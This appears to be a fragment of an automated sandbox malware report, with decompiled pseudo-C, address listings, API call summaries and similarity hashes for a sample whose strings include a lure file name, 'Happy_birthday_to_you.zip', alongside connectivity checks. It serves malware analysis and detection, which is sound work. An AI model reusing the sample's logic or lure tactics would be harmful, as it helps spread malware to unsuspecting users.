                                                                          0x0040bbad
                                                                          0x0040bb5b
                                                                          0x0040bb60
                                                                          0x0040bb60
                                                                          0x0040bb68
                                                                          0x0040bb6e
                                                                          0x0040bb73
                                                                          0x0040bb78
                                                                          0x0040bc46
                                                                          0x0040bc4b
                                                                          0x0040bc55
                                                                          0x0040bb89
                                                                          0x0040bb89
                                                                          0x0040bb8e
                                                                          0x0040bc23
                                                                          0x0040bc27
                                                                          0x0040bc35
                                                                          0x0040bc3b
                                                                          0x0040bc3b
                                                                          0x0040bb94
                                                                          0x0040bb94
                                                                          0x0040bb94
                                                                          0x0040bb97
                                                                          0x0040bba0
                                                                          0x0040bba3
                                                                          0x0040bba6
                                                                          0x0040bba6
                                                                          0x0040bc60
                                                                          0x0040bc60
                                                                          0x0040bc65
                                                                          0x00000000
                                                                          0x0040bc65
                                                                          0x0040bb83
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040bb83
                                                                          0x0040bc6f
                                                                          0x0040bc80
                                                                          0x0040bc81
                                                                          0x0040bc83
                                                                          0x0040bc86
                                                                          0x0040bc89
                                                                          0x0040bc8c
                                                                          0x0040bc8f
                                                                          0x0040bc92
                                                                          0x0040bc97
                                                                          0x0040bd12
                                                                          0x0040bd26
                                                                          0x0040bc99
                                                                          0x0040bc99
                                                                          0x0040bca0
                                                                          0x0040bd06
                                                                          0x0040bd0b
                                                                          0x0040bd0b
                                                                          0x0040bca2
                                                                          0x0040bca7
                                                                          0x0040bd81
                                                                          0x0040bd86
                                                                          0x0040bd86
                                                                          0x0040bcb2
                                                                          0x0040bd2a
                                                                          0x0040bd30
                                                                          0x0040bd33
                                                                          0x0040bd35
                                                                          0x0040bd3b
                                                                          0x0040bd40
                                                                          0x0040bd43
                                                                          0x0040bd49
                                                                          0x0040bd4b
                                                                          0x0040bcb4
                                                                          0x0040bcb4
                                                                          0x0040bcb4
                                                                          0x0040bcb7
                                                                          0x0040bcbd
                                                                          0x0040bcca
                                                                          0x0040bcd0
                                                                          0x0040bcd5
                                                                          0x0040bcda
                                                                          0x0040bd72
                                                                          0x0040bd77
                                                                          0x0040bd77
                                                                          0x0040bce5
                                                                          0x0040bd90
                                                                          0x0040bd95
                                                                          0x0040bd95
                                                                          0x0040bceb
                                                                          0x0040bcf0
                                                                          0x0040bd56
                                                                          0x0040bd5a
                                                                          0x0040bd68
                                                                          0x0040bd6a
                                                                          0x0040bd6a
                                                                          0x0040bcf2
                                                                          0x0040bcf2
                                                                          0x0040bcf2
                                                                          0x0040bcf5
                                                                          0x0040bcfe
                                                                          0x0040bd01
                                                                          0x0040bd04
                                                                          0x0040bd04
                                                                          0x0040bd9f
                                                                          0x0040bdb0
                                                                          0x0040bdb3
                                                                          0x0040bdb6
                                                                          0x0040bdb9
                                                                          0x0040bdbe
                                                                          0x0040bdc2
                                                                          0x0040bdc6
                                                                          0x0040bdd0
                                                                          0x0040bdc1
                                                                          0x0040bdc1
                                                                          0x0040bdc1
                                                                          0x0040bdbe
                                                                          0x00000000

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,0040A5E0,?,0040915F), ref: 0040BBF3
                                                                          • TlsGetValue.KERNEL32(?,?,?,00000000,0040A5E0,?,0040915F), ref: 0040BBFE
                                                                          • SetLastError.KERNEL32(?,?,?,?,00000000,0040A5E0,?,0040915F), ref: 0040BC0C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$Value
                                                                          • String ID:
                                                                          • API String ID: 1883355122-0
                                                                          • Opcode ID: fa13b5d1df785b275ee1be112967064b6d69b0b989222e142ff9d8512929a6cc
                                                                          • Instruction ID: 70379029d47ec5d74f210fe91046701c6fe62c7a006fd99b0e016d118132c0f1
                                                                          • Opcode Fuzzy Hash: fa13b5d1df785b275ee1be112967064b6d69b0b989222e142ff9d8512929a6cc
                                                                          • Instruction Fuzzy Hash: A1315B70A0061A8FCB50EF65CA84A5ABBB4FB44300B0585BED904AB796DB34FD05CBDD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 57%
                                                                          			E00401000(intOrPtr __ebx, intOrPtr __esi, intOrPtr* _a4) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr* _v24;
                                                                          				intOrPtr* _t16;
                                                                          				intOrPtr* _t27;
                                                                          				intOrPtr* _t33;
                                                                          				intOrPtr* _t37;
                                                                          
                                                                          				_v12 = __ebx;
                                                                          				_t27 = 0;
                                                                          				_v8 = __esi;
                                                                          				_t33 = 0;
                                                                          				_t16 =  *((intOrPtr*)( *_a4));
                                                                          				if(_t16 > 0xc0000091) {
                                                                          					__eflags = _t16 - 0xc0000094;
                                                                          					if(__eflags == 0) {
                                                                          						goto L3;
                                                                          					} else {
                                                                          						if(__eflags > 0) {
                                                                          							__eflags = _t16 - 0xc0000096;
                                                                          							goto L14;
                                                                          						} else {
                                                                          							__eflags = _t16 - 0xc0000093;
                                                                          							if(_t16 == 0xc0000093) {
                                                                          								goto L2;
                                                                          							} else {
                                                                          								return 0;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					if(_t16 < 0xc000008d) {
                                                                          						__eflags = _t16 - 0xc0000005;
                                                                          						if(_t16 == 0xc0000005) {
                                                                          							 *_t37 = 0xb;
                                                                          							_v24 = 0;
                                                                          							L0040C198();
                                                                          							__eflags = 0 - 1;
                                                                          							if(0 == 1) {
                                                                          								 *_t37 = 0xb;
                                                                          								_v24 = 1;
                                                                          								L0040C198();
                                                                          								goto L6;
                                                                          							} else {
                                                                          								__eflags = 0;
                                                                          								if(0 != 0) {
                                                                          									 *_t37 = 0xb;
                                                                          									 *0x00000000();
                                                                          									goto L6;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							__eflags = _t16 - 0xc000001d;
                                                                          							L14:
                                                                          							if(__eflags == 0) {
                                                                          								 *_t37 = 4;
                                                                          								_v24 = 0;
                                                                          								L0040C198();
                                                                          								__eflags = _t16 - 1;
                                                                          								if(_t16 == 1) {
                                                                          									 *_t37 = 4;
                                                                          									_v24 = 1;
                                                                          									L0040C198();
                                                                          									goto L6;
                                                                          								} else {
                                                                          									__eflags = _t16;
                                                                          									if(_t16 != 0) {
                                                                          										 *_t37 = 4;
                                                                          										 *_t16();
                                                                          										goto L6;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						L2:
                                                                          						_t33 = 1;
                                                                          						L3:
                                                                          						 *_t37 = 8;
                                                                          						_v24 = 0;
                                                                          						L0040C198();
                                                                          						if(_t16 == 1) {
                                                                          							 *_t37 = 8;
                                                                          							_v24 = 1;
                                                                          							L0040C198();
                                                                          							__eflags = _t33;
                                                                          							if(_t33 != 0) {
                                                                          								E0040B000(1);
                                                                          							}
                                                                          							goto L6;
                                                                          						} else {
                                                                          							if(_t16 != 0) {
                                                                          								 *_t37 = 8;
                                                                          								 *_t16();
                                                                          								L6:
                                                                          								_t27 = 0xffffffff;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					return _t27;
                                                                          				}
                                                                          			}










                                                                          0x00401006
                                                                          0x0040100c
                                                                          0x0040100e
                                                                          0x00401013
                                                                          0x00401015
                                                                          0x0040101c
                                                                          0x00401061
                                                                          0x00401066
                                                                          0x00000000
                                                                          0x00401068
                                                                          0x00401068
                                                                          0x004010b4
                                                                          0x00000000
                                                                          0x0040106a
                                                                          0x0040106a
                                                                          0x0040106f
                                                                          0x00000000
                                                                          0x00401071
                                                                          0x0040107c
                                                                          0x0040107c
                                                                          0x0040106f
                                                                          0x00401068
                                                                          0x0040101e
                                                                          0x00401023
                                                                          0x00401080
                                                                          0x00401085
                                                                          0x004010e2
                                                                          0x004010eb
                                                                          0x004010ef
                                                                          0x004010f4
                                                                          0x004010f7
                                                                          0x00401129
                                                                          0x00401135
                                                                          0x00401139
                                                                          0x00000000
                                                                          0x004010f9
                                                                          0x004010f9
                                                                          0x004010fb
                                                                          0x00401101
                                                                          0x00401108
                                                                          0x00000000
                                                                          0x00401108
                                                                          0x004010fb
                                                                          0x00401087
                                                                          0x00401087
                                                                          0x0040108c
                                                                          0x0040108c
                                                                          0x0040108e
                                                                          0x00401097
                                                                          0x0040109b
                                                                          0x004010a0
                                                                          0x004010a3
                                                                          0x0040110f
                                                                          0x0040111b
                                                                          0x0040111f
                                                                          0x00000000
                                                                          0x004010a5
                                                                          0x004010a5
                                                                          0x004010a7
                                                                          0x004010a9
                                                                          0x004010b0
                                                                          0x00000000
                                                                          0x004010b0
                                                                          0x004010a7
                                                                          0x004010a3
                                                                          0x0040108c
                                                                          0x00401025
                                                                          0x00401025
                                                                          0x00401025
                                                                          0x0040102a
                                                                          0x0040102a
                                                                          0x00401033
                                                                          0x00401037
                                                                          0x0040103f
                                                                          0x004010bb
                                                                          0x004010c7
                                                                          0x004010cb
                                                                          0x004010d0
                                                                          0x004010d2
                                                                          0x004010d8
                                                                          0x004010d8
                                                                          0x00000000
                                                                          0x00401041
                                                                          0x00401043
                                                                          0x00401045
                                                                          0x0040104c
                                                                          0x0040104e
                                                                          0x0040104e
                                                                          0x0040104e
                                                                          0x00401043
                                                                          0x0040103f
                                                                          0x0040105e
                                                                          0x0040105e

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: signal
                                                                          • String ID:
                                                                          • API String ID: 1946981877-0
                                                                          • Opcode ID: 9dd3622f94295c007e8091df12e6935fb1746a3fe3b08565decb20ecfd99f9c6
                                                                          • Instruction ID: 6d904beb62735350cc8560cdbfd164d6d9336f8a3c982fff81a65fa89f770588
                                                                          • Opcode Fuzzy Hash: 9dd3622f94295c007e8091df12e6935fb1746a3fe3b08565decb20ecfd99f9c6
                                                                          • Instruction Fuzzy Hash: BC3125709042449BE720AF69C58032EB6E0BB49314F15893FD9C5EB7E2C67E8DC09B4A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 40%
                                                                          			E0040BC80(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				void* _v20;
                                                                          				void* _v24;
                                                                          				intOrPtr _v40;
                                                                          				intOrPtr _v52;
                                                                          				void* _t31;
                                                                          				long _t34;
                                                                          				void* _t35;
                                                                          				void* _t36;
                                                                          				intOrPtr* _t39;
                                                                          				void* _t41;
                                                                          				void* _t52;
                                                                          				intOrPtr _t56;
                                                                          				intOrPtr _t65;
                                                                          				intOrPtr* _t67;
                                                                          				long* _t68;
                                                                          				intOrPtr* _t69;
                                                                          
                                                                          				_v8 = __edi;
                                                                          				_t60 = _a4;
                                                                          				_v16 = __ebx;
                                                                          				_v12 = __esi;
                                                                          				_t63 =  *(_t60 + 0xc);
                                                                          				if( *(_t60 + 0xc) == 0) {
                                                                          					 *_t67 = _t60;
                                                                          					return E0040B740();
                                                                          				} else {
                                                                          					_t31 =  *0x418284;
                                                                          					if(_t31 == 0) {
                                                                          						E0040B0E0(_t31);
                                                                          						_t31 =  *0x418284;
                                                                          					}
                                                                          					_t49 =  *((intOrPtr*)(_t31 + 0x30));
                                                                          					if( *((intOrPtr*)(_t31 + 0x30)) < 0) {
                                                                          						E0040B3B0(_t49, _t63);
                                                                          						_t31 =  *0x418284;
                                                                          					}
                                                                          					if( *((intOrPtr*)(_t31 + 0x30)) != 0) {
                                                                          						_t34 = GetLastError();
                                                                          						 *_t67 =  *((intOrPtr*)(_t31 + 0x2c));
                                                                          						_t63 = _t34;
                                                                          						_t35 = TlsGetValue(??);
                                                                          						_t68 = _t67 - 4;
                                                                          						 *_t68 = _t34;
                                                                          						SetLastError(??);
                                                                          						_t36 = _t35;
                                                                          						_t67 = _t68 - 4;
                                                                          					} else {
                                                                          						_t36 =  *(_t31 + 0x28);
                                                                          					}
                                                                          					_v20 = _t36;
                                                                          					_v24 = _t36;
                                                                          					if(E0040B8D0(_t60,  &_v24) == 7) {
                                                                          						_t41 =  *0x418284;
                                                                          						_t52 = _v24;
                                                                          						if(_t41 == 0) {
                                                                          							E0040B0E0(_t41);
                                                                          							_t41 =  *0x418284;
                                                                          						}
                                                                          						if( *((intOrPtr*)(_t41 + 0x30)) < 0) {
                                                                          							E0040B3B0(_t52, _t63);
                                                                          							_t41 =  *0x418284;
                                                                          						}
                                                                          						_t60 =  *((intOrPtr*)(_t41 + 0x30));
                                                                          						if( *((intOrPtr*)(_t41 + 0x30)) != 0) {
                                                                          							_v40 = _t52;
                                                                          							 *_t67 =  *((intOrPtr*)(_t41 + 0x2c));
                                                                          							if(TlsSetValue(??, ??) == 0) {
                                                                          								GetLastError();
                                                                          							}
                                                                          						} else {
                                                                          							 *((intOrPtr*)(_t41 + 0x28)) = _t52;
                                                                          						}
                                                                          						_t31 = _v24;
                                                                          						_t65 =  *((intOrPtr*)(_t31 + 0x20));
                                                                          						_t67 =  *((intOrPtr*)(_t31 + 0x28));
                                                                          						goto __ecx;
                                                                          					}
                                                                          					abort();
                                                                          					_push(_t65);
                                                                          					_t69 = _t67 - 8;
                                                                          					_t56 = _v40;
                                                                          					_t39 =  *((intOrPtr*)(_t56 + 8));
                                                                          					if(_t39 != 0) {
                                                                          						_v52 = _t56;
                                                                          						 *_t69 = 1;
                                                                          						return  *_t39();
                                                                          					} else {
                                                                          						return _t39;
                                                                          					}
                                                                          				}
                                                                          			}






















                                                                          0x0040bc86
                                                                          0x0040bc89
                                                                          0x0040bc8c
                                                                          0x0040bc8f
                                                                          0x0040bc92
                                                                          0x0040bc97
                                                                          0x0040bd12
                                                                          0x0040bd26
                                                                          0x0040bc99
                                                                          0x0040bc99
                                                                          0x0040bca0
                                                                          0x0040bd06
                                                                          0x0040bd0b
                                                                          0x0040bd0b
                                                                          0x0040bca2
                                                                          0x0040bca7
                                                                          0x0040bd81
                                                                          0x0040bd86
                                                                          0x0040bd86
                                                                          0x0040bcb2
                                                                          0x0040bd2a
                                                                          0x0040bd30
                                                                          0x0040bd33
                                                                          0x0040bd35
                                                                          0x0040bd3b
                                                                          0x0040bd40
                                                                          0x0040bd43
                                                                          0x0040bd49
                                                                          0x0040bd4b
                                                                          0x0040bcb4
                                                                          0x0040bcb4
                                                                          0x0040bcb4
                                                                          0x0040bcb7
                                                                          0x0040bcbd
                                                                          0x0040bcca
                                                                          0x0040bcd0
                                                                          0x0040bcd5
                                                                          0x0040bcda
                                                                          0x0040bd72
                                                                          0x0040bd77
                                                                          0x0040bd77
                                                                          0x0040bce5
                                                                          0x0040bd90
                                                                          0x0040bd95
                                                                          0x0040bd95
                                                                          0x0040bceb
                                                                          0x0040bcf0
                                                                          0x0040bd56
                                                                          0x0040bd5a
                                                                          0x0040bd68
                                                                          0x0040bd6a
                                                                          0x0040bd6a
                                                                          0x0040bcf2
                                                                          0x0040bcf2
                                                                          0x0040bcf2
                                                                          0x0040bcf5
                                                                          0x0040bcfe
                                                                          0x0040bd01
                                                                          0x0040bd04
                                                                          0x0040bd04
                                                                          0x0040bd9f
                                                                          0x0040bdb0
                                                                          0x0040bdb3
                                                                          0x0040bdb6
                                                                          0x0040bdb9
                                                                          0x0040bdbe
                                                                          0x0040bdc2
                                                                          0x0040bdc6
                                                                          0x0040bdd0
                                                                          0x0040bdc1
                                                                          0x0040bdc1
                                                                          0x0040bdc1
                                                                          0x0040bdbe

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0040A5BE,?,?,?,?,?,0040920F), ref: 0040BD2A
                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,0040A5BE,?,?,?,?,?,0040920F), ref: 0040BD35
                                                                          • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD43
                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD5D
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD6A
                                                                          • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD9F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$Value$abort
                                                                          • String ID:
                                                                          • API String ID: 2626461348-0
                                                                          • Opcode ID: d44fb8144051525f46a2ddd0a77b2159513e5a59cadc495b3667b9b5871e9868
                                                                          • Instruction ID: 54ad4b7b80f31364e908b692a5ee0ad386bd410343df76c18df6e0f8c4ff5425
                                                                          • Opcode Fuzzy Hash: d44fb8144051525f46a2ddd0a77b2159513e5a59cadc495b3667b9b5871e9868
                                                                          • Instruction Fuzzy Hash: A0312A70A04609CFDB40EF65D680AAAB7B4FF48300B1585BED855AB391DB34AD01CBDE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleTime
                                                                          • String ID:
                                                                          • API String ID: 3397143404-0
                                                                          • Opcode ID: 6ae7f4e56724e33a2a17575310c9cca5a702e644e45d336fa09f717b1ac5613f
                                                                          • Instruction ID: 821c52c15d2594163c2509e09139001ce0ed311c0e70272f4ce7e626a9184330
                                                                          • Opcode Fuzzy Hash: 6ae7f4e56724e33a2a17575310c9cca5a702e644e45d336fa09f717b1ac5613f
                                                                          • Instruction Fuzzy Hash: B0210AB09083019BE700EF39C59535BBFE4AB84358F008A3DE994973D2E779C648CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 00402A87
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • lstrcat.KERNEL32 ref: 00402AAF
                                                                          • lstrcat.KERNEL32 ref: 00402AD1
                                                                          • lstrcat.KERNEL32 ref: 00402AEB
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 00402B10
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Strings
                                                                          • Happy_birthday_to_you.zip, xrefs: 00402B05
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
                                                                          • String ID: Happy_birthday_to_you.zip
                                                                          • API String ID: 1562643418-1870604427
                                                                          • Opcode ID: 444f3cb21bfd082fe6ff21f2be50a688dd714ba8539f5d8e29ecb1546971eae2
                                                                          • Instruction ID: cc83420afc5f1d077a3f5b7fbaa549a80263fd77f6117133aa0d2265757cdded
                                                                          • Opcode Fuzzy Hash: 444f3cb21bfd082fe6ff21f2be50a688dd714ba8539f5d8e29ecb1546971eae2
                                                                          • Instruction Fuzzy Hash: 3C21FF759043048BC710EF64D98169EBBF0EF84314F40897FE584A7341EB389698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 004029DD
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • lstrcat.KERNEL32 ref: 00402A05
                                                                          • lstrcat.KERNEL32 ref: 00402A27
                                                                          • lstrcat.KERNEL32 ref: 00402A41
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 00402A66
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
